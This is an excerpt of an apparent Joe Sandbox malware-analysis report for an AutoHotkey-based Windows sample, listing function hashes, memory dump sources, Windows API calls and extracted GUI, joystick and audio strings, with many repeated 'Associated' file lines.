Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d186b98b513837793b61e11376f4cc7fb4c9a34c70524711ef5f5aacd34fa1a6
Instruction ID: 191f289279ac4a721e1125c615a42383e97b45b9b7497908f2ad60b3d9187b44
Opcode Fuzzy Hash: d186b98b513837793b61e11376f4cc7fb4c9a34c70524711ef5f5aacd34fa1a6
Instruction Fuzzy Hash: B50188B1345641AEEB10D7B5AC04BE73FAA6786340F088579E45947B90C3399844CB5D

Function 0041757E Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49a9e8030144e5341144506c440d63dbe886b4e78eeeec81fd8184175d747b63
Instruction ID: 168e17e3b9a99b64dd7a552084b6e8295e778e3d4fb874abe82df0be1cde7230
Opcode Fuzzy Hash: 49a9e8030144e5341144506c440d63dbe886b4e78eeeec81fd8184175d747b63
Instruction Fuzzy Hash: 10D0A972286280ABC724CBB5AC047C63F68A382240F08463A5448C7F61C738D94DCB2F

Function 0070D95B Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416b558bd78ff7233426088886f2c41f50c21484775c820fb8f8e9c8e0a8a401
Instruction ID: 75d9987d53bcda34e58cbe8bb4172518ca6e267a58c3f26633af84b0067bb9d1
Opcode Fuzzy Hash: 416b558bd78ff7233426088886f2c41f50c21484775c820fb8f8e9c8e0a8a401
Instruction Fuzzy Hash: 78B012180049508D560299151450DB623D89708310B114DD75694D7100C50444C5579A

Function 0044DF70 Relevance: 38.9, APIs: 13, Strings: 9, Instructions: 445windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001101,00000000,00000000), ref: 0044E033
__fassign.LIBCMT ref: 0044E19D
SendMessageA.USER32(?,00001100,00000000,?), ref: 0044E3F1
SendMessageA.USER32(00000000,0000110D,00000000,00000008), ref: 0044E447
SendMessageA.USER32(00000000,00001114,00000000,?), ref: 0044E474
SendMessageA.USER32(?,0000110B,00000005,?), ref: 0044E48C
SendMessageA.USER32(?,0000110B,00000000,?), ref: 0044E4A7

Strings

Expand, xrefs: 0044E21E
Icon, xrefs: 0044E2D4
Check, xrefs: 0044E287
Sort, xrefs: 0044E309
Bold, xrefs: 0044E1DB
Select, xrefs: 0044E167
", xrefs: 0044E2EE
First, xrefs: 0044E1AC, 0044E361
Vis, xrefs: 0044E197

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$__fassign
String ID: "$Bold$Check$Expand$First$Icon$Select$Sort$Vis
API String ID: 2240494164-3379154359
Opcode ID: e18cba81a67f368f4bdb3324aa66dfd47c7e2fb5b2b237abe73b0375b14ff9b6
Instruction ID: 4f024d0270c717b90789c5a4f8a1e0ff8b375a674e5c4786067d053d4b47cb40
Opcode Fuzzy Hash: e18cba81a67f368f4bdb3324aa66dfd47c7e2fb5b2b237abe73b0375b14ff9b6
Instruction Fuzzy Hash: 51F1E2B06083419FF7219F268841B6B7BE4BF85304F18496EE98597382E378DD45CB5A

Function 0044D160 Relevance: 31.9, APIs: 11, Strings: 7, Instructions: 416windowCOMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0044D2D5
__fassign.LIBCMT ref: 0044D315
__fassign.LIBCMT ref: 0044D358

Part of subcall function 0048828D: __mbsnbicmp_l.LIBCMT ref: 0048829D

__fassign.LIBCMT ref: 0044D3AD
__fassign.LIBCMT ref: 0044D3DE

Part of subcall function 00474A60: _vswprintf_s.LIBCMT ref: 00474A79

SendMessageA.USER32(00000001,00001004,00000000,00000000), ref: 0044D458
SendMessageA.USER32(00000001,00001007,00000000,00000008), ref: 0044D4DC
SendMessageA.USER32(00000001,00001006,00000000,00000008), ref: 0044D528
SendMessageA.USER32(?,00001013,?,00000000), ref: 0044D54D
SendMessageA.USER32(0049B8BD,00001006,00000000,?), ref: 0044D61D
SendMessageA.USER32(0136CD30,0000102F,?,00000000), ref: 0044D677

Part of subcall function 0040EE40: __wcstoi64.LIBCMT ref: 0040EE50

Strings

Icon, xrefs: 0044D3D8
Check, xrefs: 0044D352
I, xrefs: 0044D665
Col, xrefs: 0044D3A7
Focus, xrefs: 0044D30F
Select, xrefs: 0044D2C8
Vis, xrefs: 0044D402

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$__fassign$__mbsnbicmp_l__wcstoi64_vswprintf_s
String ID: Check$Col$Focus$I$Icon$Select$Vis
API String ID: 1455740473-322541112
Opcode ID: faa4a3bbc0e8e6790c5c3b2632045cfa577793bb49d94f0d125642382536cce8
Instruction ID: ba8c65ecdc8f47b9f0ca6c3d3ebabd4e4cdf17b015f630caf168bd7f7065a75b
Opcode Fuzzy Hash: faa4a3bbc0e8e6790c5c3b2632045cfa577793bb49d94f0d125642382536cce8
Instruction Fuzzy Hash: ADE1D270A083419FE720DF24C84572BBBE0AF59354F18496FF88997381E778D945CB9A

Function 00479CB0 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 339COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00479D61
__wcstoui64.LIBCMT ref: 00479DDA

Strings

exe, xrefs: 00479F13
group, xrefs: 00479E72
ahk_, xrefs: 00479D1B, 00479F70, 00479FA1, 0047A05C
pid, xrefs: 00479E19
class, xrefs: 00479F35

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign__wcstoui64
String ID: ahk_$class$exe$group$pid
API String ID: 1532211443-2955265324
Opcode ID: 6e4c785f177d60f06041c48924e4fa9828120719e650bc6394a411993243bc6f
Instruction ID: 39a41ecf68f03ddd44caecf405cdee15eb61125e7a4b1002dffe5643ed465b16
Opcode Fuzzy Hash: 6e4c785f177d60f06041c48924e4fa9828120719e650bc6394a411993243bc6f
Instruction Fuzzy Hash: F6C123316043418BD7319E248841BEBBBD5AF95304F18882FE4CD87382EB7D9D59C79A

Function 0040CBE0 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00474A60: _vswprintf_s.LIBCMT ref: 00474A79

__itow.LIBCMT ref: 0040CC89

Strings

TypeOff?LevelRunningName-------------------------------------------------------------------, xrefs: 0040CBF1
m-hook, xrefs: 0040CCD3
joypoll, xrefs: 0040CD0A
2-hooks, xrefs: 0040CCF4
(no), xrefs: 0040CE44
k-hook, xrefs: 0040CCB2
%i-%i, xrefs: 0040CDC1
%s%s%s%s%s%s, xrefs: 0040CE6C
OFF, xrefs: 0040CD38, 0040CD53, 0040CE65
-, xrefs: 0040CDFE
PART, xrefs: 0040CD87

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __itow_vswprintf_s
String ID: %i-%i$%s%s%s%s%s%s$(no)$-$2-hooks$OFF$PART$TypeOff?LevelRunningName-------------------------------------------------------------------$joypoll$k-hook$m-hook
API String ID: 2948144822-746698434
Opcode ID: a9f2b710bbfe5e10ded90a352a34e87ddca263a4c7cdf49164b3cd4fb607f771
Instruction ID: 78cc8c4a5ec08597b6be3b8399d12c79d050abd824ba735e7406db4e5d668a3a
Opcode Fuzzy Hash: a9f2b710bbfe5e10ded90a352a34e87ddca263a4c7cdf49164b3cd4fb607f771
Instruction Fuzzy Hash: 91819E70608381DBE724DF24D880B677BA1AF95308F18467BE889A73D1E338D945C79E

Function 00466650 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 246COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004666A0

Strings

bold, xrefs: 00466848
norm, xrefs: 00466895
italic, xrefs: 00466870
underline, xrefs: 004668C6
strike, xrefs: 00466975

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset
String ID: bold$italic$norm$strike$underline
API String ID: 2102423945-336929268
Opcode ID: a4b97eff4915c592adec0c89e34466dcd86037663e89a86b58b25b79d14af72a
Instruction ID: b1a6b272bdcdc050260e0060a7c505e55273496d6311b4062aeafb47756eb8ed
Opcode Fuzzy Hash: a4b97eff4915c592adec0c89e34466dcd86037663e89a86b58b25b79d14af72a
Instruction Fuzzy Hash: 2E8127B15083846AE720AB658C01BAB7BD46B91314F054A6FF9855B3C2F7BC950CC35B

Function 0044FB90 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 198COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 0044FBD6
__fassign.LIBCMT ref: 0044FBFD
__wcstoi64.LIBCMT ref: 0044FC2E

Part of subcall function 00489456: __wcstoi64.LIBCMT ref: 0048944C

Strings

JoyZ, xrefs: 0044FC8F
JoyX, xrefs: 0044FC5B
JoyU, xrefs: 0044FCC3
Joy, xrefs: 0044FBF7
JoyButtons, xrefs: 0044FD2B
JoyPOV, xrefs: 0044FCF7
JoyY, xrefs: 0044FC75
JoyV, xrefs: 0044FCDD
JoyAxes, xrefs: 0044FD45
JoyInfo, xrefs: 0044FD5F
JoyName, xrefs: 0044FD11
JoyR, xrefs: 0044FCA9

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64$__fassign
String ID: Joy$JoyAxes$JoyButtons$JoyInfo$JoyName$JoyPOV$JoyR$JoyU$JoyV$JoyX$JoyY$JoyZ
API String ID: 3041097304-249873715
Opcode ID: 863095eab1936dee98af8a05783cc0b3db0b82df91ba5783194598082f20d249
Instruction ID: 9c2637e7a45e2e2a61bd67ad6278943ce8abaaa112c7406d8ba539dd64e3043c
Opcode Fuzzy Hash: 863095eab1936dee98af8a05783cc0b3db0b82df91ba5783194598082f20d249
Instruction Fuzzy Hash: 22411662A4462022FA21302EBC52BFF52894FB2766F19447BFC05C9391F74CDE8B519E

Function 0045BA40 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 145COMMON

Download Yara Rule

Strings

Move, xrefs: 0045BA74
Disable, xrefs: 0045BB59
Focus, xrefs: 0045BAA4
Hide, xrefs: 0045BB97
Text, xrefs: 0045BA5C
Enable, xrefs: 0045BB29
ChooseString, xrefs: 0045BAD4
MoveDraw, xrefs: 0045BA8C
Choose, xrefs: 0045BABC
Font, xrefs: 0045BAEC
Show, xrefs: 0045BB78

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Choose$ChooseString$Disable$Enable$Focus$Font$Hide$Move$MoveDraw$Show$Text
API String ID: 0-4148050024
Opcode ID: 24da04aa5353601c0242bebe0241b18b9ca8c9f6e3e9d2d190400140ae3ac0e9
Instruction ID: 946c5811c03e44b689d6a81abea116e3e5ae595097306e7237af5ccffe725b93
Opcode Fuzzy Hash: 24da04aa5353601c0242bebe0241b18b9ca8c9f6e3e9d2d190400140ae3ac0e9
Instruction Fuzzy Hash: A231AF41A8020122EE1030295D43BBF2689DB62B5BFE844BFFC40D5687F78DDD0DA29E

Function 00465B30 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 281windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000001,00000472,00000000,00000000), ref: 00465B86
SendMessageA.USER32(?,00000400,00000000,00000000), ref: 00465BDB
SendMessageA.USER32(00000000,00000402,00000000,00000000), ref: 00465BF7
SendMessageA.USER32(?,00000401,00000000,00000000), ref: 00465C0F
SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00465C45
SendMessageA.USER32(?,00001001,00000000,?), ref: 00465C74
GetWindowLongA.USER32(?,000000F0), ref: 00465CC1
SendMessageA.USER32(?,00001005,00000000,?), ref: 00465CDA
SendMessageA.USER32(00000001,00000402,00000000,00000000), ref: 00465D59

Strings

Submit, xrefs: 00465B44
-, xrefs: 00465CF5
Text, xrefs: 00465D82

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID: -$Submit$Text
API String ID: 312131281-678919423
Opcode ID: e18620c802ebeb465e6766a99d54b5e647b228a824e344482ef8aad2bed40cf1
Instruction ID: b5cf3dd30dadfda3f3776fb44514fa6328c0ab56a0a47a31175b27fc587289b3
Opcode Fuzzy Hash: e18620c802ebeb465e6766a99d54b5e647b228a824e344482ef8aad2bed40cf1
Instruction Fuzzy Hash: 03713E7234430067E630AB29AC46F67B39CEB95725F108A3FFB84EA1C1D565EC04876D

Function 00440E80 Relevance: 24.8, APIs: 8, Strings: 6, Instructions: 278COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00440F1A
_strncpy.LIBCMT ref: 00440F46
_strncpy.LIBCMT ref: 00440FD6
_strncpy.LIBCMT ref: 00441039

Strings

Select File - %s, xrefs: 00440FEE
The maximum number of File Dialogs has been reached., xrefs: 00440EAD
(, xrefs: 00440F26
X, xrefs: 00441086
%s%c%s%cAll Files (*.*)%c*.*%c, xrefs: 004410F4
::{, xrefs: 00440F14

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy$__fassign
String ID: %s%c%s%cAll Files (*.*)%c*.*%c$($::{$Select File - %s$The maximum number of File Dialogs has been reached.$X
API String ID: 2389604872-2056514435
Opcode ID: 22ed4d7a5f3a710cc8e17e61d1cd7d4fd1b96bf33ad8162d538f7ddbc23ef226
Instruction ID: e40edca8eee688491dd316e07a8d7f0f0f0eacde8144c58616e39315f8ec0659
Opcode Fuzzy Hash: 22ed4d7a5f3a710cc8e17e61d1cd7d4fd1b96bf33ad8162d538f7ddbc23ef226
Instruction Fuzzy Hash: F5A14A70D043486AFB30DB64CC01BDB7B746B05304F1841ABEA44663D1E7BD5A98CB9E

Function 00431850 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 208COMMON

Download Yara Rule

APIs

Part of subcall function 00488EC1: __mbschr_l.LIBCMT ref: 00488ECE

__wcstoi64.LIBCMT ref: 00431895

Part of subcall function 00489456: __wcstoi64.LIBCMT ref: 0048944C

Strings

Speakers, xrefs: 004318D5
PCSpeaker, xrefs: 004319C1
Line, xrefs: 0043192B
Telephone, xrefs: 004319A3
N/A, xrefs: 00431A39
Synth, xrefs: 00431967
Digital, xrefs: 0043190D
Analog, xrefs: 00431A1B
Aux, xrefs: 004319FD
Microphone, xrefs: 00431949
Headphones, xrefs: 004318EF
Wave, xrefs: 004319DF
Master, xrefs: 004318BB

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64$__mbschr_l
String ID: Analog$Aux$Digital$Headphones$Line$Master$Microphone$N/A$PCSpeaker$Speakers$Synth$Telephone$Wave
API String ID: 2607663179-2477456585
Opcode ID: 20993accbe46541ca5eba28a452691b9b685e6cfaab304fd3a1722884085f2f1
Instruction ID: 77441921a30e50b67e8df99ca96663a5973fdee912fd936acbd140faa978fd90
Opcode Fuzzy Hash: 20993accbe46541ca5eba28a452691b9b685e6cfaab304fd3a1722884085f2f1
Instruction Fuzzy Hash: C551B37675812513DF10202D7C417FA218E4BAA37AF14933BF82DDA3D1EB8DD85082AD

Function 00431A70 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 143COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 00431A99

Part of subcall function 00489F2E: strtoxq.LIBCMT ref: 00489F4F

Strings

StereoEnh, xrefs: 00431B52
BassBoost, xrefs: 00431B6D
OnOff, xrefs: 00431AE6
Pan, xrefs: 00431B88
Volume, xrefs: 00431AD0
Mute, xrefs: 00431B01
QSoundPan, xrefs: 00431BA3
Loudness, xrefs: 00431B37
Vol, xrefs: 00431ABA
Treble, xrefs: 00431BD9
Mono, xrefs: 00431B1C
Equalizer, xrefs: 00431BF4
Bass, xrefs: 00431BBE

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64strtoxq
String ID: Bass$BassBoost$Equalizer$Loudness$Mono$Mute$OnOff$Pan$QSoundPan$StereoEnh$Treble$Vol$Volume
API String ID: 1429983981-1456001458
Opcode ID: b680ada05d611f3a223719b2cf668aa8c74e3f44bab42db09149e5b849fbb47a
Instruction ID: 2a7fdf3856fed8c2e76782a928f4fa43b489e2f9d57cf3c3dd5624415476e829
Opcode Fuzzy Hash: b680ada05d611f3a223719b2cf668aa8c74e3f44bab42db09149e5b849fbb47a
Instruction Fuzzy Hash: C1314381F4561122EE11312A2C13B9F74440F76B5BFD9947AFC0895382F65EEA2981FF

